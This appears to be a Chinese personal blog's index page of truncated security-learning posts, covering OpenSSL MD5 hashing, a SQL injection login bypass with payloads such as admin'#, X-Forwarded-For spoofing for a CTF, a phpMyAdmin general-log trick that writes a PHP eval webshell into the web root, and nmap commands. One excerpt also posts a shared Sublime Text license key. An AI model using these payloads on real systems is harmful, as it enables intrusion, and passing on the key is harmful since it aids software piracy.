2020-3-5 myluzh
NOTE
0x01 MD5加密
交互式输入
[root@kali ~]# openssl
OpenSSL> md5
123456
(stdin)= f447b20a7fcbf53a5d5be013ea0b15af
OpenSSL> md5
123456(stdin)= e10adc3949ba59abbe56e057f20f883e #MD5计算时包含了回车符
OpenSSL> [root@kali ~]#
[root@kali ~]# openssl
OpenSSL> md5
123456(stdin)= e10adc3949ba59abbe56e057f20f883e #输入完后按Crtl+D三次
管道标准输入处理
[root@kali ~]# echo 123456 |openssl md5 #MD5计算时包含了回车符
(stdin)= f447b20a7fcbf53a5d5be013ea0b15af
[root@kali ~]# echo -n 123456 |openssl md5 #-n 不带回车符,才是正确的
(stdin)= e10adc3949ba59abbe56e0...
阅读全文>>
标签: kali linux openssl md5 加密
评论(0)
(1221)
2020-3-5 myluzh
NOTE
0x01安装
进入官网 下载Sublime Text 3 并且安装,官网下载太慢的话可以复制下载链接用迅雷下载。
0x02注册
运行Sublime, 先点击状态栏的help,再点击进入enter lisence ,跳出来一个对话框,把下面的激活码复制进去即可注册。
----- BEGIN LICENSE -----
Member J2TeaM
Single User License
EA7E-1011316
D7DA350E 1B8B0760 972F8B60 F3E64036
B9B4E234 F356F38F 0AD1E3B7 0E9C5FAD
FA0A2ABE 25F65BD8 D51458E5 3923CE80
87428428 79079A01 AA69F319 A1AF29A4
A684C2DC 0B1583D4 19CBD290 217618CD
5653E0A0 BACE3948 BB2EE45E 422D2C87
DD9AF44B 99C49590 D2DBDEE1 75860FD2
8C8BB2AD B2ECE5A4 EFC08AF2 25A9B86...
阅读全文>>
评论(0)
(1006)
2020-3-4 myluzh
NOTE
0x01适用条件
1.这个登陆系统用如下SQL语句来进行登陆校验
select * from user where username = '$username' and password='$passowrd'
这种sql语句,一般后面的判断就是如果数据库中存在用户名为$username, 密码为$passowrd的用户,就登陆成功,否则就登陆失败。
2.系统没有对用户输入进行全面的过滤
3. 系统后台使用的是MYSQL数据库
4. 系统中存在一个username为admin的用户
0x02注入方法
1.用户名输入:admin’or’1 ,密码随便输入,即可成功登陆。把我们输入用户名代入sql语句可以发现,or只需要满足username = 'admin'即可。
select * from user where username = 'admin' or' 1' and password='123456'
2.或者使用sql中的注释符# 用户名输入:admin’# ,密码随便输入,即可成功登陆。把我们输入用户名代入sql语句可以发现,sql语句#后面的内容都被注释掉了,也就是只需要满足usern...
阅读全文>>
标签: sql注入
评论(0)
(1840)
2020-3-4 myluzh
NOTE
关于HTTP X-Forwarded-For 介绍
需要伪造请求端为127.0.0.1,直接burpsuite抓包,然后增加字段X-forwarded-for: 127.0.0.1,提交即可
例如下面有一道CTF题,前面部分就是利用伪造xforwardedfor来实现访问的,如下,访问后提示没有访问对象的权限,对象受保护或服务器不可读。
第一时间就想到了,伪造http请求头,直接burpsuite抓包,增加字段X-forwarded-for: 127.0.0.1,注意下面要有空行。然后直接发送就好了。
成功进入
阅读全文>>
标签: X-Forwarded-For
评论(0)
(1090)
2020-3-3 myluzh
PHP
条件:需要使用root登陆phpmyadmin
0x01开启日志
进入phpmyadmin后,选择变量
1.找到“general log”选择“ON”开启,也可以通过sql语句开启日志
set global general_log='on'
2.找到“general log file”选项把日志后缀名.log改为.php,把路径改到站点根目录www下面,也可通过执行sql语句,修改日志保存位置
set global general_log_file='D:/phpstudy_pro/WWW/log.php'
要写日志文件路径必须要知道根路径,否则即使写入了也无法访问,也就自然无法getshell。可以通过sql语句show variables like 'datadir'查询数据库位置,一般情况可以知道根路径。爆路径的方法具体情况具体分析
0x02写入shell
执行sql查询语句,然后php一句话就会被记录到日志文件中。
SELECT"<?php @eval($_REQUEST['a']);?>"
我们可以查看日志文件,一句话已经被写入:
0x03拿shell
访问站点...
阅读全文>>
标签: 渗透 phpMyAdmin 日志 getwebshell
评论(0)
(853)
2020-3-3 myluzh
SECURE
目标规格
开关
例
描述
nmap 192.168.1.1
扫描一个IP
nmap 192.168.1.1 192.168.2.1
扫描特定的IP地址
nmap 192.168.1.1-254
扫描一个范围
...
阅读全文>>
评论(0)
(742)